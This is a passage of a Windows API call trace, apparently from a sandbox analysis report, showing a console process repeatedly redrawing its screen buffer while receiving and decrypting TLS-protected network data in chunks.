lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0161.939] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0162.598] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0162.600] CoTaskMemAlloc (cb=0x780) returned 0x1e35146d810 [0162.600] WriteConsoleOutputW (in: hConsoleOutput=0x398, lpBuffer=0x1e35146d810, dwBufferSize=0x40078, dwBufferCoord=0x0, lpWriteRegion=0xb156f8d070 | out: lpWriteRegion=0xb156f8d070) returned 1 [0162.601] CoTaskMemFree (pv=0x1e35146d810) [0162.601] recv (in: s=0x898, buf=0x1e3393bf4d0, len=5, flags=0 | out: buf=0x1e3393bf4d0*) returned 5 [0162.601] recv (in: s=0x898, buf=0x1e3393bf4d5, len=88, flags=0 | out: buf=0x1e3393bf4d5*) returned 88 [0162.601] DecryptMessage (in: phContext=0x1e3394bbff0, pMessage=0x1e3395906e8, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x1e3395906e8, pfQOP=0x0) returned 0x0 [0162.601] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0162.602] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0162.703] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0162.704] CoTaskMemAlloc (cb=0x780) returned 0x1e35146d810 [0162.704] WriteConsoleOutputW (in: hConsoleOutput=0x398, lpBuffer=0x1e35146d810, dwBufferSize=0x40078, dwBufferCoord=0x0, lpWriteRegion=0xb156f8d070 | out: lpWriteRegion=0xb156f8d070) returned 1 [0162.704] CoTaskMemFree (pv=0x1e35146d810) [0162.705] recv (in: s=0x898, buf=0x1e3393bf4d0, len=5, flags=0 | out: buf=0x1e3393bf4d0*) returned 5 [0162.705] recv (in: s=0x898, buf=0x1e3393bf4d5, len=16344, flags=0 | out: buf=0x1e3393bf4d5*) returned 16344 [0162.705] DecryptMessage (in: phContext=0x1e3394bbff0, pMessage=0x1e339593680, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x1e339593680, pfQOP=0x0) returned 0x0 [0162.706] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0162.706] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0162.794] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0162.794] CoTaskMemAlloc (cb=0x780) returned 0x1e35146d810 [0162.795] WriteConsoleOutputW (in: hConsoleOutput=0x398, lpBuffer=0x1e35146d810, dwBufferSize=0x40078, dwBufferCoord=0x0, lpWriteRegion=0xb156f8d070 | out: lpWriteRegion=0xb156f8d070) returned 1 [0162.795] CoTaskMemFree (pv=0x1e35146d810) [0162.795] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0162.796] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0162.872] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0162.873] CoTaskMemAlloc (cb=0x780) returned 0x1e35146d810 [0162.873] WriteConsoleOutputW (in: hConsoleOutput=0x398, lpBuffer=0x1e35146d810, dwBufferSize=0x40078, dwBufferCoord=0x0, lpWriteRegion=0xb156f8d070 | out: lpWriteRegion=0xb156f8d070) returned 1 [0162.874] CoTaskMemFree (pv=0x1e35146d810) [0162.874] recv (in: s=0x898, buf=0x1e3393bf4d0, len=5, flags=0 | out: buf=0x1e3393bf4d0*) returned 5 [0162.874] recv (in: s=0x898, buf=0x1e3393bf4d5, len=88, flags=0 | out: buf=0x1e3393bf4d5*) returned 88 [0162.874] DecryptMessage (in: phContext=0x1e3394bbff0, pMessage=0x1e3395993d0, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x1e3395993d0, pfQOP=0x0) returned 0x0 [0162.874] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0162.874] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0162.954] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0162.954] CoTaskMemAlloc (cb=0x780) returned 0x1e35146d810 [0162.954] WriteConsoleOutputW (in: hConsoleOutput=0x398, lpBuffer=0x1e35146d810, dwBufferSize=0x40078, dwBufferCoord=0x0, lpWriteRegion=0xb156f8d070 | out: lpWriteRegion=0xb156f8d070) returned 1 [0162.955] CoTaskMemFree (pv=0x1e35146d810) [0162.955] recv (in: s=0x898, buf=0x1e3393bf4d0, len=5, flags=0 | out: buf=0x1e3393bf4d0*) returned 5 [0162.955] recv (in: s=0x898, buf=0x1e3393bf4d5, len=16344, flags=0 | out: buf=0x1e3393bf4d5*) returned 16344 [0162.955] DecryptMessage (in: phContext=0x1e3394bbff0, pMessage=0x1e33959c368, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x1e33959c368, pfQOP=0x0) returned 0x0 [0162.955] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0162.956] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0163.118] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0163.119] CoTaskMemAlloc (cb=0x780) returned 0x1e35146d810 [0163.119] WriteConsoleOutputW (in: hConsoleOutput=0x398, lpBuffer=0x1e35146d810, dwBufferSize=0x40078, dwBufferCoord=0x0, lpWriteRegion=0xb156f8d070 | out: lpWriteRegion=0xb156f8d070) returned 1 [0163.119] CoTaskMemFree (pv=0x1e35146d810) [0163.120] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0163.120] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0163.197] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0163.197] CoTaskMemAlloc (cb=0x780) returned 0x1e35146d810 [0163.198] WriteConsoleOutputW (in: hConsoleOutput=0x398, lpBuffer=0x1e35146d810, dwBufferSize=0x40078, dwBufferCoord=0x0, lpWriteRegion=0xb156f8d070 | out: lpWriteRegion=0xb156f8d070) returned 1 [0163.198] CoTaskMemFree (pv=0x1e35146d810) [0163.198] recv (in: s=0x898, buf=0x1e3393bf4d0, len=5, flags=0 | out: buf=0x1e3393bf4d0*) returned 5 [0163.198] recv (in: s=0x898, buf=0x1e3393bf4d5, len=88, flags=0 | out: buf=0x1e3393bf4d5*) returned 88 [0163.198] DecryptMessage (in: phContext=0x1e3394bbff0, pMessage=0x1e3395a20b8, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x1e3395a20b8, pfQOP=0x0) returned 0x0 [0163.198] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0163.199] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0163.276] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0163.276] CoTaskMemAlloc (cb=0x780) returned 0x1e35146d810 [0163.276] WriteConsoleOutputW (in: hConsoleOutput=0x398, lpBuffer=0x1e35146d810, dwBufferSize=0x40078, dwBufferCoord=0x0, lpWriteRegion=0xb156f8d070 | out: lpWriteRegion=0xb156f8d070) returned 1 [0163.277] CoTaskMemFree (pv=0x1e35146d810) [0163.277] recv (in: s=0x898, buf=0x1e3393bf4d0, len=5, flags=0 | out: buf=0x1e3393bf4d0*) returned 5 [0163.277] recv (in: s=0x898, buf=0x1e3393bf4d5, len=16296, flags=0 | out: buf=0x1e3393bf4d5*) returned 16296 [0163.277] DecryptMessage (in: phContext=0x1e3394bbff0, pMessage=0x1e3395a5050, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x1e3395a5050, pfQOP=0x0) returned 0x0 [0163.282] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0163.283] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0163.366] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0163.367] CoTaskMemAlloc (cb=0x780) returned 0x1e35146d810 [0163.367] WriteConsoleOutputW (in: hConsoleOutput=0x398, lpBuffer=0x1e35146d810, dwBufferSize=0x40078, dwBufferCoord=0x0, lpWriteRegion=0xb156f8d070 | out: lpWriteRegion=0xb156f8d070) returned 1 [0163.367] CoTaskMemFree (pv=0x1e35146d810) [0163.368] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0163.368] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0163.446] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0163.447] CoTaskMemAlloc (cb=0x780) returned 0x1e35146d810 [0163.447] WriteConsoleOutputW (in: hConsoleOutput=0x398, lpBuffer=0x1e35146d810, dwBufferSize=0x40078, dwBufferCoord=0x0, lpWriteRegion=0xb156f8d070 | out: lpWriteRegion=0xb156f8d070) returned 1 [0163.447] CoTaskMemFree (pv=0x1e35146d810) [0163.447] recv (in: s=0x898, buf=0x1e3393bf4d0, len=5, flags=0 | out: buf=0x1e3393bf4d0*) returned 5 [0163.447] recv (in: s=0x898, buf=0x1e3393bf4d5, len=72, flags=0 | out: buf=0x1e3393bf4d5*) returned 72 [0163.447] DecryptMessage (in: phContext=0x1e3394bbff0, pMessage=0x1e3395aada0, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x1e3395aada0, pfQOP=0x0) returned 0x0 [0163.447] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0163.448] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0163.528] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0163.528] CoTaskMemAlloc (cb=0x780) returned 0x1e35146d810 [0163.528] WriteConsoleOutputW (in: hConsoleOutput=0x398, lpBuffer=0x1e35146d810, dwBufferSize=0x40078, dwBufferCoord=0x0, lpWriteRegion=0xb156f8d070 | out: lpWriteRegion=0xb156f8d070) returned 1 [0163.529] CoTaskMemFree (pv=0x1e35146d810) [0163.529] recv (in: s=0x898, buf=0x1e3393bf4d0, len=5, flags=0 | out: buf=0x1e3393bf4d0*) returned 5 [0163.529] recv (in: s=0x898, buf=0x1e3393bf4d5, len=16344, flags=0 | out: buf=0x1e3393bf4d5*) returned 16344 [0163.529] DecryptMessage (in: phContext=0x1e3394bbff0, pMessage=0x1e3395add38, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x1e3395add38, pfQOP=0x0) returned 0x0 [0163.529] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0163.530] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0163.606] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0163.607] CoTaskMemAlloc (cb=0x780) returned 0x1e35146d810 [0163.607] WriteConsoleOutputW (in: hConsoleOutput=0x398, lpBuffer=0x1e35146d810, dwBufferSize=0x40078, dwBufferCoord=0x0, lpWriteRegion=0xb156f8d070 | out: lpWriteRegion=0xb156f8d070) returned 1 [0163.607] CoTaskMemFree (pv=0x1e35146d810) [0163.607] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0163.608] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0163.686] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0163.687] CoTaskMemAlloc (cb=0x780) returned 0x1e35146d810 [0163.687] WriteConsoleOutputW (in: hConsoleOutput=0x398, lpBuffer=0x1e35146d810, dwBufferSize=0x40078, dwBufferCoord=0x0, lpWriteRegion=0xb156f8d070 | out: lpWriteRegion=0xb156f8d070) returned 1 [0163.687] CoTaskMemFree (pv=0x1e35146d810) [0163.687] recv (in: s=0x898, buf=0x1e3393bf4d0, len=5, flags=0 | out: buf=0x1e3393bf4d0*) returned 5 [0163.687] recv (in: s=0x898, buf=0x1e3393bf4d5, len=152, flags=0 | out: buf=0x1e3393bf4d5*) returned 152 [0163.687] DecryptMessage (in: phContext=0x1e3394bbff0, pMessage=0x1e3395b3a88, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x1e3395b3a88, pfQOP=0x0) returned 0x0 [0163.687] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0163.688] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0163.765] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0163.766] CoTaskMemAlloc (cb=0x780) returned 0x1e35146d810 [0163.766] WriteConsoleOutputW (in: hConsoleOutput=0x398, lpBuffer=0x1e35146d810, dwBufferSize=0x40078, dwBufferCoord=0x0, lpWriteRegion=0xb156f8d070 | out: lpWriteRegion=0xb156f8d070) returned 1 [0163.766] CoTaskMemFree (pv=0x1e35146d810) [0163.766] recv (in: s=0x898, buf=0x1e3393bf4d0, len=5, flags=0 | out: buf=0x1e3393bf4d0*) returned 5 [0163.766] recv (in: s=0x898, buf=0x1e3393bf4d5, len=16344, flags=0 | out: buf=0x1e3393bf4d5*) returned 16344 [0163.766] DecryptMessage (in: phContext=0x1e3394bbff0, pMessage=0x1e3395b6a20, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x1e3395b6a20, pfQOP=0x0) returned 0x0 [0163.767] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0163.767] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0163.852] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0163.853] CoTaskMemAlloc (cb=0x780) returned 0x1e35146d810 [0163.853] WriteConsoleOutputW (in: hConsoleOutput=0x398, lpBuffer=0x1e35146d810, dwBufferSize=0x40078, dwBufferCoord=0x0, lpWriteRegion=0xb156f8d070 | out: lpWriteRegion=0xb156f8d070) returned 1 [0163.853] CoTaskMemFree (pv=0x1e35146d810) [0163.853] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0163.854] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0163.935] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0163.935] CoTaskMemAlloc (cb=0x780) returned 0x1e35146d810 [0163.935] WriteConsoleOutputW (in: hConsoleOutput=0x398, lpBuffer=0x1e35146d810, dwBufferSize=0x40078, dwBufferCoord=0x0, lpWriteRegion=0xb156f8d070 | out: lpWriteRegion=0xb156f8d070) returned 1 [0163.936] CoTaskMemFree (pv=0x1e35146d810) [0163.936] recv (in: s=0x898, buf=0x1e3393bf4d0, len=5, flags=0 | out: buf=0x1e3393bf4d0*) returned 5 [0163.936] recv (in: s=0x898, buf=0x1e3393bf4d5, len=16344, flags=0 | out: buf=0x1e3393bf4d5*) returned 16344 [0163.936] DecryptMessage (in: phContext=0x1e3394bbff0, pMessage=0x1e3395bc770, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x1e3395bc770, pfQOP=0x0) returned 0x0 [0163.937] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0163.937] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0164.187] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0164.187] CoTaskMemAlloc (cb=0x780) returned 0x1e35146d810 [0164.187] WriteConsoleOutputW (in: hConsoleOutput=0x398, lpBuffer=0x1e35146d810, dwBufferSize=0x40078, dwBufferCoord=0x0, lpWriteRegion=0xb156f8d070 | out: lpWriteRegion=0xb156f8d070) returned 1 [0164.188] CoTaskMemFree (pv=0x1e35146d810) [0164.188] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0164.189] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0164.287] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0164.288] CoTaskMemAlloc (cb=0x780) returned 0x1e35146d810 [0164.288] WriteConsoleOutputW (in: hConsoleOutput=0x398, lpBuffer=0x1e35146d810, dwBufferSize=0x40078, dwBufferCoord=0x0, lpWriteRegion=0xb156f8d070 | out: lpWriteRegion=0xb156f8d070) returned 1 [0164.288] CoTaskMemFree (pv=0x1e35146d810) [0164.289] recv (in: s=0x898, buf=0x1e3393bf4d0, len=5, flags=0 | out: buf=0x1e3393bf4d0*) returned 5 [0164.289] recv (in: s=0x898, buf=0x1e3393bf4d5, len=16344, flags=0 | out: buf=0x1e3393bf4d5*) returned 16344 [0164.290] DecryptMessage (in: phContext=0x1e3394bbff0, pMessage=0x1e3395c24c0, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x1e3395c24c0, pfQOP=0x0) returned 0x0 [0164.290] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0164.291] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0164.403] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0164.404] CoTaskMemAlloc (cb=0x780) returned 0x1e35146d810 [0164.404] WriteConsoleOutputW (in: hConsoleOutput=0x398, lpBuffer=0x1e35146d810, dwBufferSize=0x40078, dwBufferCoord=0x0, lpWriteRegion=0xb156f8d070 | out: lpWriteRegion=0xb156f8d070) returned 1 [0164.405] CoTaskMemFree (pv=0x1e35146d810) [0164.405] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0164.405] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0164.555] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0164.556] CoTaskMemAlloc (cb=0x780) returned 0x1e35146d810 [0164.556] WriteConsoleOutputW (in: hConsoleOutput=0x398, lpBuffer=0x1e35146d810, dwBufferSize=0x40078, dwBufferCoord=0x0, lpWriteRegion=0xb156f8d070 | out: lpWriteRegion=0xb156f8d070) returned 1 [0164.557] CoTaskMemFree (pv=0x1e35146d810) [0164.557] recv (in: s=0x898, buf=0x1e3393bf4d0, len=5, flags=0 | out: buf=0x1e3393bf4d0*) returned 5 [0164.557] recv (in: s=0x898, buf=0x1e3393bf4d5, len=16344, flags=0 | out: buf=0x1e3393bf4d5*) returned 16344 [0164.557] DecryptMessage (in: phContext=0x1e3394bbff0, pMessage=0x1e3395c8210, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x1e3395c8210, pfQOP=0x0) returned 0x0 [0164.557] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0164.558] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0164.657] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0164.658] CoTaskMemAlloc (cb=0x780) returned 0x1e35146d810 [0164.658] WriteConsoleOutputW (in: hConsoleOutput=0x398, lpBuffer=0x1e35146d810, dwBufferSize=0x40078, dwBufferCoord=0x0, lpWriteRegion=0xb156f8d070 | out: lpWriteRegion=0xb156f8d070) returned 1 [0164.658] CoTaskMemFree (pv=0x1e35146d810) [0164.659] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0164.659] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0164.758] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0164.758] CoTaskMemAlloc (cb=0x780) returned 0x1e35146d810 [0164.759] WriteConsoleOutputW (in: hConsoleOutput=0x398, lpBuffer=0x1e35146d810, dwBufferSize=0x40078, dwBufferCoord=0x0, lpWriteRegion=0xb156f8d070 | out: lpWriteRegion=0xb156f8d070) returned 1 [0164.759] CoTaskMemFree (pv=0x1e35146d810) [0164.759] recv (in: s=0x898, buf=0x1e3393bf4d0, len=5, flags=0 | out: buf=0x1e3393bf4d0*) returned 5 [0164.759] recv (in: s=0x898, buf=0x1e3393bf4d5, len=16344, flags=0 | out: buf=0x1e3393bf4d5*) returned 16344 [0164.759] DecryptMessage (in: phContext=0x1e3394bbff0, pMessage=0x1e3395cdf60, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x1e3395cdf60, pfQOP=0x0) returned 0x0 [0164.760] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0164.762] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0164.871] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0164.872] CoTaskMemAlloc (cb=0x780) returned 0x1e35146d810 [0164.872] WriteConsoleOutputW (in: hConsoleOutput=0x398, lpBuffer=0x1e35146d810, dwBufferSize=0x40078, dwBufferCoord=0x0, lpWriteRegion=0xb156f8d070 | out: lpWriteRegion=0xb156f8d070) returned 1 [0164.873] CoTaskMemFree (pv=0x1e35146d810) [0164.873] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0164.873] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0164.951] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0164.951] CoTaskMemAlloc (cb=0x780) returned 0x1e35146d810 [0164.952] WriteConsoleOutputW (in: hConsoleOutput=0x398, lpBuffer=0x1e35146d810, dwBufferSize=0x40078, dwBufferCoord=0x0, lpWriteRegion=0xb156f8d070 | out: lpWriteRegion=0xb156f8d070) returned 1 [0164.952] CoTaskMemFree (pv=0x1e35146d810) [0164.952] recv (in: s=0x898, buf=0x1e3393bf4d0, len=5, flags=0 | out: buf=0x1e3393bf4d0*) returned 5 [0164.952] recv (in: s=0x898, buf=0x1e3393bf4d5, len=16344, flags=0 | out: buf=0x1e3393bf4d5*) returned 16344 [0164.952] DecryptMessage (in: phContext=0x1e3394bbff0, pMessage=0x1e3395d3cb0, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x1e3395d3cb0, 